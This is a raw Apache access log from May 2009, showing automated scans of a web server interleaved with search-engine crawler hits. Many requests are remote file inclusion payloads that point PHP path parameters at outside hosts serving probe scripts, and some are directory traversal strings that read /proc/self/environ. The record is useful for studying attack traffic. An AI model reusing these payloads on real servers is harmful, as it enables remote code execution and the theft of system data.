212.150.52.114 - - [13/May/2009:10:34:35 -0500] "GET /logs/access_log.1232841600//shop/index.php?_shop_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:10:34:36 -0500] "GET /logs/access_log.1238284800//shop/index.php?_shop_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:10:34:36 -0500] "GET /logs/access_log.1232841600//shop/index.php?_shop_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:10:34:36 -0500] "GET /logs//shop/index.php?_shop_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:10:34:36 -0500] "GET //shop/index.php?_shop_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
69.162.71.138 - - [13/May/2009:10:35:25 -0500] "GET /logs/access_log.1225238400http://www.amd2009.xpg.com.br/testarx.php? HTTP/1.1" 404 350 "-""Mozilla/3.0 (compatible; Indy Library)"
69.162.71.138 - - [13/May/2009:10:35:26 -0500] "GET /logs/access_log.1229126400http://www.amd2009.xpg.com.br/testarx.php? HTTP/1.1" 404 350 "-""Mozilla/3.0 (compatible; Indy Library)"
69.162.71.138 - - [13/May/2009:10:35:46 -0500] "GET /logs/access_log.1236729600http://www.amd2009.xpg.com.br/testarx.php? HTTP/1.1" 404 350 "-""Mozilla/3.0 (compatible; Indy Library)"
69.162.71.138 - - [13/May/2009:10:35:46 -0500] "GET /logs/access_log.1239580800http://www.amd2009.xpg.com.br/testarx.php? HTTP/1.1" 404 350 "-""Mozilla/3.0 (compatible; Indy Library)"
66.249.67.180 - - [13/May/2009:10:35:46 -0500] "GET /logs/access_log.1183248000 HTTP/1.1" 200 1690 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.98.202.10 - - [13/May/2009:10:39:40 -0500] "GET /logs/access_log.1238284800//?include_location=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
66.98.202.10 - - [13/May/2009:10:39:40 -0500] "GET //?include_location=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
66.98.202.10 - - [13/May/2009:10:39:42 -0500] "GET /logs//?include_location=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 200 189195 "-""Mozilla/5.0"
66.98.202.10 - - [13/May/2009:10:39:53 -0500] "GET /logs/access_log.1237939200//?include_location=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:10:41:15 -0500] "GET /logs/access_log.1173571200 HTTP/1.1" 200 6059 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.162.71.138 - - [13/May/2009:10:42:41 -0500] "GET /logs/access_log.1225238400http://www.dualnamoro.com/tester.php? HTTP/1.1" 404 345 "-""Mozilla/3.0 (compatible; Indy Library)"
69.162.71.138 - - [13/May/2009:10:42:41 -0500] "GET /logs/access_log.1229126400http://www.dualnamoro.com/tester.php? HTTP/1.1" 404 345 "-""Mozilla/3.0 (compatible; Indy Library)"
69.162.71.138 - - [13/May/2009:10:42:45 -0500] "GET /logs/access_log.1239580800http://www.dualnamoro.com/tester.php? HTTP/1.1" 404 345 "-""Mozilla/3.0 (compatible; Indy Library)"
69.162.71.138 - - [13/May/2009:10:42:45 -0500] "GET /logs/access_log.1236729600http://www.dualnamoro.com/tester.php? HTTP/1.1" 404 345 "-""Mozilla/3.0 (compatible; Indy Library)"
208.64.202.135 - - [13/May/2009:10:44:47 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:10:44:47 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:10:44:47 -0500] "GET /logs/access_log.1236038400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:10:44:52 -0500] "GET /logs/access_log.1236384000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
91.202.4.158 - - [13/May/2009:10:46:17 -0500] "GET //?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3245 "-""XXXXXX"
91.202.4.158 - - [13/May/2009:10:46:17 -0500] "GET //?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3245 "-""XXXXXX"
91.202.4.158 - - [13/May/2009:10:46:19 -0500] "GET /logs//?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 189195 "-""XXXXXX"
91.202.4.158 - - [13/May/2009:10:46:22 -0500] "GET /logs//?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 189195 "-""XXXXXX"
66.249.67.180 - - [13/May/2009:10:46:25 -0500] "GET /logs/access_log.1108080000 HTTP/1.1" 200 192 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.158.163.65 - - [13/May/2009:10:49:18 -0500] "GET /logs/index.php?_shop_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
212.158.163.65 - - [13/May/2009:10:49:18 -0500] "GET /index.php?_shop_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
212.158.163.65 - - [13/May/2009:10:49:18 -0500] "GET /logs/index.php?_shop_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
212.158.163.65 - - [13/May/2009:10:49:19 -0500] "GET /index.php?_shop_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
201.232.54.48 - - [13/May/2009:10:51:35 -0500] "GET /logs/index.php?_shop_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
201.232.54.48 - - [13/May/2009:10:51:35 -0500] "GET /index.php?_shop_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
201.232.54.48 - - [13/May/2009:10:51:44 -0500] "GET /logs/outlogin.php?_zb_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
201.232.54.48 - - [13/May/2009:10:51:44 -0500] "GET /outlogin.php?_zb_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
92.50.143.90 - - [13/May/2009:10:51:49 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
92.50.143.90 - - [13/May/2009:10:51:49 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
66.249.67.180 - - [13/May/2009:10:51:50 -0500] "GET /logs/access_log.1177372800 HTTP/1.1" 200 3457 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.89.33.167 - - [13/May/2009:10:56:33 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:10:56:33 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:10:56:33 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:10:56:38 -0500] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
81.177.3.205 - - [13/May/2009:10:57:14 -0500] "GET /logs/oneadmin/newspublish//include.php?path[docroot]=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
81.177.3.205 - - [13/May/2009:10:57:14 -0500] "GET /logs/oneadmin/newspublish//include.php?path[docroot]=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
66.249.67.180 - - [13/May/2009:10:57:14 -0500] "GET /logs/access_log.1229904000 HTTP/1.1" 200 71455 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
81.177.3.205 - - [13/May/2009:10:57:19 -0500] "GET /oneadmin/newspublish//include.php?path[docroot]=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.811"
81.177.3.205 - - [13/May/2009:10:57:19 -0500] "GET /oneadmin/newspublish//include.php?path[docroot]=http://www.asd.org.br/sex.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.811"
91.202.4.158 - - [13/May/2009:10:57:28 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 200 3245 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
91.202.4.158 - - [13/May/2009:10:57:29 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
91.202.4.158 - - [13/May/2009:10:57:29 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3245 "-""XXXXXX"
91.202.4.158 - - [13/May/2009:10:57:30 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3245 "-""XXXXXX"
91.202.4.158 - - [13/May/2009:10:57:30 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 200 189195 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
91.202.4.158 - - [13/May/2009:10:57:31 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
91.202.4.158 - - [13/May/2009:10:57:33 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 189195 "-""XXXXXX"
91.202.4.158 - - [13/May/2009:10:57:36 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 189195 "-""XXXXXX"
64.34.161.16 - - [13/May/2009:10:57:41 -0500] "GET //shop/index.php?_shop_path=http://cocoking.com/upload/gallery/id.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
64.34.161.16 - - [13/May/2009:10:57:41 -0500] "GET /logs//shop/index.php?_shop_path=http://cocoking.com/upload/gallery/id.txt???? HTTP/1.1" 404 303 "-""libwww-perl/5.803"
91.197.162.90 - - [13/May/2009:10:58:35 -0500] "GET /logs/index.php?_shop_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
91.197.162.90 - - [13/May/2009:10:58:35 -0500] "GET /index.php?_shop_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
211.233.19.201 - - [13/May/2009:11:00:41 -0500] "GET //components/com_virtuemart/_theme/breadcrumb.php?rootBase=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 331 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
211.233.19.201 - - [13/May/2009:11:00:50 -0500] "GET /logs//components/com_virtuemart/_theme/breadcrumb.php?rootBase=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 336 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
211.233.19.201 - - [13/May/2009:11:00:57 -0500] "GET //components/com_virtuemart/_theme/breadcrumb.php?rootBase=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 331 "-""XXXXXX"
211.233.19.201 - - [13/May/2009:11:01:01 -0500] "GET //components/com_virtuemart/_theme/breadcrumb.php?rootBase=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 331 "-""XXXXXX"
211.233.19.201 - - [13/May/2009:11:01:03 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Microsoft Pocket Internet Explorer/0.6"
211.233.19.201 - - [13/May/2009:11:01:04 -0500] "GET /logs//components/com_virtuemart/_theme/breadcrumb.php?rootBase=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 336 "-""XXXXXX"
65.55.106.205 - - [13/May/2009:11:01:12 -0500] "GET /logs/access_log.1186099200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.32.100.130 - - [13/May/2009:11:01:17 -0500] "GET /environment.php?DIR_PREFIX=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
200.32.100.130 - - [13/May/2009:11:01:17 -0500] "GET /logs/environment.php?DIR_PREFIX=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
200.32.100.130 - - [13/May/2009:11:01:17 -0500] "GET /logs/access_log.1233964800/environment.php?DIR_PREFIX=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
200.32.100.130 - - [13/May/2009:11:01:36 -0500] "GET /logs/access_log.1234396800/environment.php?DIR_PREFIX=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:11:02:20 -0500] "GET /logs/access_log.1230163200 HTTP/1.1" 200 78966 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.64.202.135 - - [13/May/2009:11:04:42 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:11:04:42 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:11:04:42 -0500] "GET /logs/access_log.1236729600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:11:04:44 -0500] "GET /logs/access_log.1240617600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
75.145.152.113 - - [13/May/2009:11:07:22 -0500] "GET /logs/errors.php?error=http://208.98.22.241/id.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
75.145.152.113 - - [13/May/2009:11:07:24 -0500] "GET /errors.php?error=http://208.98.22.241/id.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
66.249.67.180 - - [13/May/2009:11:07:28 -0500] "GET /logs/access_log.1227916800 HTTP/1.1" 200 14430 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
116.122.158.194 - - [13/May/2009:11:07:29 -0500] "GET /logs/index.php?conteudo=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
116.122.158.194 - - [13/May/2009:11:07:30 -0500] "GET /index.php?conteudo=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
85.17.162.28 - - [13/May/2009:11:07:33 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abirdseyeviewof.com/files/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
85.17.162.28 - - [13/May/2009:11:07:33 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.abirdseyeviewof.com/files/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.106.225.205 - - [13/May/2009:11:08:13 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kimstroy.by//assets/images/pit-id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
87.106.225.205 - - [13/May/2009:11:08:13 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kimstroy.by//assets/images/pit-id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
66.249.67.180 - - [13/May/2009:11:12:46 -0500] "GET /logs/access_log.1230940800 HTTP/1.1" 200 148780 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
113.29.225.7 - - [13/May/2009:11:14:54 -0500] "GET /logs//index.php?abs_path=http://www.geocities.com/andrie_it/id1.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
113.29.225.7 - - [13/May/2009:11:14:54 -0500] "GET //index.php?abs_path=http://www.geocities.com/andrie_it/id1.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
113.29.225.7 - - [13/May/2009:11:15:03 -0500] "GET /logs//index.php?abs_path=http://www.geocities.com/andrie_it/id1.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
113.29.225.7 - - [13/May/2009:11:15:03 -0500] "GET //index.php?abs_path=http://www.geocities.com/andrie_it/id1.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.52.137.82 - - [13/May/2009:11:15:19 -0500] "GET /logs/add.php?APB_rp=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 295 "-""Mozilla/4.61 [en] (OS/2; U)"
74.52.137.82 - - [13/May/2009:11:15:19 -0500] "GET /add.php?APB_rp=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 290 "-""Mozilla/4.61 [en] (OS/2; U)"
74.52.137.82 - - [13/May/2009:11:15:19 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
74.52.137.82 - - [13/May/2009:11:15:19 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
74.52.137.82 - - [13/May/2009:11:15:19 -0500] "GET /add.php?APB_rp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 290 "-""XXXXXX"
74.52.137.82 - - [13/May/2009:11:15:19 -0500] "GET /logs/add.php?APB_rp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 295 "-""XXXXXX"
74.52.137.82 - - [13/May/2009:11:15:20 -0500] "GET /logs/add.php?APB_rp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""XXXXXX"
74.52.137.82 - - [13/May/2009:11:15:20 -0500] "GET /add.php?APB_rp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""XXXXXX"
85.214.86.93 - - [13/May/2009:11:15:21 -0500] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:11:15:21 -0500] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:11:15:21 -0500] "GET /logs/access_log.1231372800/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:11:15:21 -0500] "GET /logs/access_log.1233187200/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:11:23:24 -0500] "GET /logs/access_log.1226793600 HTTP/1.1" 200 21305 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.149.241.210 - - [13/May/2009:11:24:43 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kimstroy.by//assets/images/r.jpg?? HTTP/1.1" 404 325 "-""libwww-perl/5.806"
89.149.241.210 - - [13/May/2009:11:24:44 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kimstroy.by//assets/images/r.jpg?? HTTP/1.1" 404 320 "-""libwww-perl/5.806"
91.202.4.158 - - [13/May/2009:11:26:24 -0500] "GET /breadcrumb.php?rootBase=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 297 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
91.202.4.158 - - [13/May/2009:11:26:24 -0500] "GET /logs/breadcrumb.php?rootBase=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
91.202.4.158 - - [13/May/2009:11:26:24 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
91.202.4.158 - - [13/May/2009:11:26:24 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
91.202.4.158 - - [13/May/2009:11:26:25 -0500] "GET /breadcrumb.php?rootBase=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 297 "-""XXXXXX"
91.202.4.158 - - [13/May/2009:11:26:25 -0500] "GET /logs/breadcrumb.php?rootBase=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 302 "-""XXXXXX"
91.202.4.158 - - [13/May/2009:11:26:25 -0500] "GET /breadcrumb.php?rootBase=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""XXXXXX"
91.202.4.158 - - [13/May/2009:11:26:25 -0500] "GET /logs/breadcrumb.php?rootBase=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""XXXXXX"
121.165.73.157 - - [13/May/2009:11:26:32 -0500] "GET /logs/access_log.1238371200//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.wdpa.org.tw/html/id.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:11:26:32 -0500] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.wdpa.org.tw/html/id.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:11:26:32 -0500] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.wdpa.org.tw/html/id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:11:26:48 -0500] "GET /logs/access_log.1236643200//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.wdpa.org.tw/html/id.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
89.149.241.210 - - [13/May/2009:11:27:09 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.kimstroy.by//assets/images/r.jpg?? HTTP/1.1" 404 323 "-""libwww-perl/5.806"
89.149.241.210 - - [13/May/2009:11:27:09 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.kimstroy.by//assets/images/r.jpg?? HTTP/1.1" 404 318 "-""libwww-perl/5.806"
77.221.130.2 - - [13/May/2009:11:27:25 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
77.221.130.2 - - [13/May/2009:11:27:26 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:11:28:15 -0500] "GET /logs/access_log.1235865600//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.wdpa.org.tw/html/id.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
66.249.67.180 - - [13/May/2009:11:28:38 -0500] "GET /logs/access_log.1229126400 HTTP/1.1" 200 26019 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.232.102.70 - - [13/May/2009:11:28:49 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
66.232.102.70 - - [13/May/2009:11:28:49 -0500] "GET //include/admin.lib.inc.php?site_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
66.232.102.70 - - [13/May/2009:11:28:49 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.215.4.114 - - [13/May/2009:11:30:29 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kimstroy.by//assets/images/_MD.TXT??? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
121.165.73.157 - - [13/May/2009:11:30:54 -0500] "GET /logs/access_log.1238889600//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.wdpa.org.tw/html/id.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
201.76.47.224 - - [13/May/2009:11:30:59 -0500] "GET /logs//components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 337 "-""libwww-perl/5.805"
201.76.47.224 - - [13/May/2009:11:30:59 -0500] "GET //components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 332 "-""libwww-perl/5.805"
65.55.106.205 - - [13/May/2009:11:32:26 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.205 - - [13/May/2009:11:35:09 -0500] "GET /logs/access_log.1192838400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.149.241.210 - - [13/May/2009:11:36:46 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.kimstroy.by//assets/images/r.jpg?? HTTP/1.1" 404 323 "-""libwww-perl/5.806"
89.149.241.210 - - [13/May/2009:11:36:46 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.kimstroy.by//assets/images/r.jpg?? HTTP/1.1" 404 318 "-""libwww-perl/5.806"
